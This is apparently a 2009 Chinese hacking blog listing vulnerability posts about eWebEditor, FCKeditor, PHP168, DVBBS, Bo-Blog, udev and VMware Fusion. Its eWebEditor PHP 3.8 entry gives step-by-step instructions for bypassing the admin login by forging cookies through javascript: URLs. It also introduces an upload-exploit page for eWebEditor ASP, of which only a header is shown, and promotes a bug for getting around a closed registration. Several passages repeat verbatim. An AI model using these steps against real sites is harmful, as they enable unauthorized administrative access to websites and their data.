Fckeditor的一些漏洞总结
作者:许诺 日期:2009-11-09
PHP168 6.0及以下版本漏洞
作者:许诺 日期:2009-09-10
BDATuner.MPEG2TuneRequest新漏洞
作者:许诺 日期:2009-07-05
php版ewebeditor 3.8的漏洞
作者:许诺 日期:2009-06-11
php版ewebeditor 3.8的漏洞
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
Tags: ewebeditor php 漏洞 eweb
动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞
作者:许诺 日期:2009-05-26
Bo-Blog 2.0.3 注射漏洞
作者:许诺 日期:2009-05-08
eweb的些漏洞 方便自己查阅
作者:许诺 日期:2009-05-07
eWebEditor是基于浏览器的、 所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。 WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的 网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
最新的ewebeditor asp版 2.1.6 上传漏洞,由于Upload.asp过滤不严,可以直接引起上传漏洞,奉送代码:
最新的ewebeditor asp版 2.1.6 上传漏洞,由于Upload.asp过滤不严,可以直接引起上传漏洞,奉送代码:
复制内容到剪贴板
程序代码
程序代码<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----by <a href=http://hi.baidu.com/乔3少>乔3少</a></H1><br><br>
苹果茶注册漏洞
作者:许诺 日期:2009-04-30
苹果, 注册
“苹果茶”是一款内网建站的小软件,对于了解内网建站的朋友应该听说过吧,只要我们在本机上安装它就可以实现别人通过WEB访问我们的结果,我们可以通过此进行内网上线,由于此软件的功能强大,绿色小巧……得到了国内网民的热烈欢迎,短时间内注册和下载人数不断上升,后来让人们没有想到的是“苹果茶”官网竟然禁止了新用户注册!
导致很多人没来得及注册,因此少了一种内网上线的方式!
下面就是注册可以正常注册的访问页面 是个BUG 这个BUG一定很快会被官方的人发现 要注册的人赶快了
“苹果茶”是一款内网建站的小软件,对于了解内网建站的朋友应该听说过吧,只要我们在本机上安装它就可以实现别人通过WEB访问我们的结果,我们可以通过此进行内网上线,由于此软件的功能强大,绿色小巧……得到了国内网民的热烈欢迎,短时间内注册和下载人数不断上升,后来让人们没有想到的是“苹果茶”官网竟然禁止了新用户注册!
导致很多人没来得及注册,因此少了一种内网上线的方式!
下面就是注册可以正常注册的访问页面 是个BUG 这个BUG一定很快会被官方的人发现 要注册的人赶快了
Linux爆本地提权漏洞 请立即更新udev程序
作者:许诺 日期:2009-04-24
udev,linux有史以来最危险的本地安全漏洞
作者:许诺 日期:2009-04-24
讯时网站管理系统漏洞
作者:许诺 日期:2009-04-20
Linux Kernel 2.6 UDEV 本地提权
作者:许诺 日期:2009-04-20
VMware曝漏洞:Windows虚拟机可攻击Mac主机
作者:许诺 日期:2009-04-18
一位安全研究人员今天表示,虚拟化软件VMware的Mac版本Fusion中存在一个严重安全漏洞,这是Mac用户的噩梦,因为利用该漏洞可以通过Windows虚拟机在Mac主机上执行恶意代码,所幸VMware已经发布了Fusion 2.0.4修复了该漏洞.Immunity公司的研究人员Kostya Korchinsky表示,VMware虚拟机显示功能中的一个严重漏洞可以被用来在主机操作系统上读取和写入内存,Korchinsky制作了一个视频 演示了利用该漏洞对主机系统进行攻击(http://www.immunityinc.com/documentation/cloudburst- vista.html),演示中,主机运行Vista SP1,虚拟机运行Windows XP.
在今天的一封Email中,Korchinsky说:“这确实是一种虚拟机对主机的攻击,它利用VMware中显示功能的一些漏洞在主机上任意读取和写入内存,也就是说虚拟机可以有效绕过Vista SP1上的ASLR和DEP而在主机上运行代码.”
同样的方法适用于运行Mac OS X的主机,Korchinsky表示:“同样的漏洞存在于Fusion中,运行Windows或Linux的虚拟机也可以利用该漏洞在Mac OS X主机上执行任意代码.”
在今天的一封Email中,Korchinsky说:“这确实是一种虚拟机对主机的攻击,它利用VMware中显示功能的一些漏洞在主机上任意读取和写入内存,也就是说虚拟机可以有效绕过Vista SP1上的ASLR和DEP而在主机上运行代码.”
同样的方法适用于运行Mac OS X的主机,Korchinsky表示:“同样的漏洞存在于Fusion中,运行Windows或Linux的虚拟机也可以利用该漏洞在Mac OS X主机上执行任意代码.”
